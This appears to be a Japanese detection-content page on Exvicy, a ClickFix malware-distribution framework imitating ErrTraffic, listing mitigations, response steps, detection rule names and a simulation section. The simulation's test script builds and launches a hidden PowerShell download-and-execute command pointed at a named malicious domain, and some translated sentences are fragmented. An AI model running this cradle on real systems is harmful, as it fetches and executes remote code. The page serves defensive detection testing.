Exvicy:ErrTrafficマルウェア配布フレームワークの模倣者
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Exvicyは、新たなMalware-as-a-Service (MaaS) ClickFix配布フレームワークであり、サイバー犯罪フォーラムで宣伝されています。ユーザーにWindowsの実行ダイアログを介して悪意あるPowerShellコマンドを実行させるために、Cloudflare Turnstileチャレンジを模倣するソーシャルエンジニアリングを使用しています。このフレームワークはErrTrafficを綿密に模倣しており、JavaScriptのコードベースや難読化技術を大部分再利用しています。
調査
TDRアナリストは、Exploit.INフォーラムで共有された管理パネルのスクリーンショットから、アクティブなC2インフラストラクチャを発見しました。特定のCloudflareネームサーバーとドメイン登録パターンを分析することで、研究者は複数の悪意あるドメインやWordPressの侵害されたウェブサイトを特定しました。技術分析により、特徴的なJavaScript関数と逆分析回避ロジックを含むErrTrafficコードの広範な再利用が確認されました。
緩和策
組織はこれらのキャンペーンに関連する既知の悪意あるドメインや疑わしいTLDをブロックするために、堅牢なウェブフィルタリングを展開する必要があります。特にコマンドを含む異常なPowerShellの実行を監視し制限するために、エンドポイント保護も必要です。 irm or iex。ユーザーはキーボードショートカットを使用するよう指示するソーシャルエンジニアリングのプロンプトを識別するために訓練されるべきです。 Win+R を使用してコマンドを実行します。
対応
Exvicyの活動が検出された場合、追加のコマンド実行やペイロード配信を防ぐために、影響を受けたホストを直ちに隔離するべきです。レスポンダーは、実行されたコマンドと関連するネットワーク接続を特定するために、PowerShellの運用ログを確認するべきです。既知のC2 IPアドレスとドメインは、環境内の他の侵害されたWordPressアセットを確認するためのスイープの後に、境界でブロックされるべきです。
攻撃の流れ
この部分はまだ更新中です。
検出
異常なトップレベルドメイン(TLD)DNS要求による疑わしいコマンド&コントロール(dns経由)
LOLBinのセマンティクスを持つ疑わしいRunMRUエントリ(registry_event経由)
検出されるIOCs(SourceIP):Exvicy:ErrTrafficマルウェア配布フレームワークの模倣品
検出されるIOCs(DestinationIP):Exvicy:ErrTrafficマルウェア配布フレームワークの模倣品
Exvicyマルウェアの悪意あるPowerShellコマンド実行の検出 [Windows Powershell]
Win + Rショートカット経由でのExvicyフレームワークコマンド実行 [Windowsプロセス作成]
シミュレーション実行
-
攻撃のシナリオとコマンド: 攻撃者はフィッシングを通じてユーザーに悪意のあるショートカットまたは文書を届けます。実行時(T1204.002)、ユーザーは無意識のうちにPowerShellプロセス(T1059.001)をトリガーします。攻撃者の目的は、二次ペイロードをダウンロードすることで足場を築くことです。Exvicyフレームワークを模倣するために、コマンドラインは特定の既知の悪意のあるドメインを含むように作成されています。
recaptcha-check.com/8E9curHNH8UfAMLz悪意のあるエージェントを引き出すため。 -
リグレッションテストスクリプト:
# Exvicy検出ルールをトリガーするシミュレーションスクリプト。 # Sigmaルールで特定されたコマンドラインパターンを模倣します。 $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz" $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`"" Write-Host "[+] シミュレーション開始:検出をトリガーするコマンドを実行中..." Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`"" Write-Host "[+] シミュレーションコマンドが送信されました。SIEMでアラートを確認してください。" -
クリーンアップコマンド:
# クリーンアップ:この特定のシミュレーションでは永続ファイルは作成されませんが、 # 残存するPowerShellプロセスが稼働していないことを確認します。 Stop-Process -Name "powershell" -ErrorAction SilentlyContinue Write-Host "[+] クリーンアップ完了。"